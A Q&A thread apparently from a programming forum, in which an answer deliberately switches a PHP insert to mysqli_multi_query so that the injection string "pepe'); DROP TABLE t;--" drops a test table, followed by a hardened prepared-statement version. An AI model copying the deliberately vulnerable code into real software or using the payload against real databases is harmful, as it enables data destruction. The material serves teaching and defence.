Could you please tell me why my SQL-Injection isn't working and how can I fix it? I tried to go after the example from Here, but value'); DROP TABLE table;-- or password 1=1 doesn't work. I'm sorry to steal your time with these easy things, but I tried it many times and I didn't get it running and the other post didn't help me.
<?php
$connection = mysqli_connect('localhost', 'root','' ,'DB') or die(mysqli_error());
mysqli_select_db($connection ,'DB')or die(mysqli_error());
@$unsafe_variable = $_POST['vorname'];
mysqli_query($connection, "INSERT INTO `Persons` (`Vorname`) VALUES ('$unsafe_variable')");
In order to test SQL Injection with your code we need to make a few changes:
<?php
$connection = mysqli_connect('localhost', 'root','' ,'DB') or
die(mysqli_error($connection)); //1
mysqli_select_db($connection ,'DB') or die(mysqli_error($connection)); //2
$unsafe_variable = $_POST['vorname'];
mysqli_multi_query($connection, //3
"INSERT INTO `Persons` (`Vorname`) VALUES ('$unsafe_variable')");
?>
mysqli_error needs the $connection parameter.
mysqli_multi_query is able to execute more than one sentence at a time. For security reasons, mysqli_query just executes one to prevent SQL injection.
It's time to test SQL injection. We create a simple table t to check if we can drop it through SQL injection:
create table t ( i int );
Time to attack, the killer string to inject sql is:
pepe'); DROP TABLE t;--
SQL with injected code:
"INSERT INTO Persons (Vorname) VALUES ('pepe'); DROP TABLE t;--')"
"INSERT INTO Persons (Vorname) VALUES ('$unsafe_variable')"
$unsafe_variable: "INSERT INTO Persons (Vorname) VALUES ('pepe'); DROP TABLE t;--')"
After posting this value to the form:
mysql> select * from t;
ERROR 1146 (42S02): Table 's.t' doesn't exist
Man, this is the Internet, there are a lot of papers about it. Start your search with Parameterized Queries.
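The parameterized form of the insert from this thread, as an added example that is not part of the original question or answer. It assumes the same local database `DB` with the tables `Persons` (`Vorname`) and `t` already created; the function name `insert_person` is hypothetical.

```php
<?php
// Added example: hardened version of the INSERT discussed in this thread.
// Assumes database 'DB' with tables `Persons` (`Vorname`) and `t` exists.

// Make mysqli throw exceptions instead of failing silently.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

// insert_person() is a hypothetical helper name used only for this example.
function insert_person(mysqli $connection, string $vorname): int
{
    // The statement text is fixed. The value is sent separately as a bound
    // parameter, so quotes, semicolons and comment markers inside it are
    // stored as data and never parsed as SQL.
    $stmt = $connection->prepare('INSERT INTO `Persons` (`Vorname`) VALUES (?)');
    $stmt->bind_param('s', $vorname);
    $stmt->execute();
    $rows = $stmt->affected_rows;
    $stmt->close();
    return $rows;
}

$connection = new mysqli('localhost', 'root', '', 'DB');
$connection->set_charset('utf8mb4');

// Use the posted value when present, otherwise the test string from the answer.
$vorname = $_POST['vorname'] ?? "pepe'); DROP TABLE t;--";
if (!is_string($vorname) || $vorname === '') {
    http_response_code(400);
    exit('vorname is required');
}

insert_person($connection, $vorname);

// Check 1: the string was stored verbatim as a row value.
$check = $connection->prepare('SELECT COUNT(*) FROM `Persons` WHERE `Vorname` = ?');
$check->bind_param('s', $vorname);
$check->execute();
$check->bind_result($count);
$check->fetch();
$check->close();

// Check 2: table t is still present after the insert.
$tStillExists = $connection->query("SHOW TABLES LIKE 't'")->num_rows === 1;

printf("matching rows: %d, table t present: %s\n", $count, $tStillExists ? 'yes' : 'no');
```

If `t` was dropped by the earlier test, recreate it with `create table t ( i int );` before running this check.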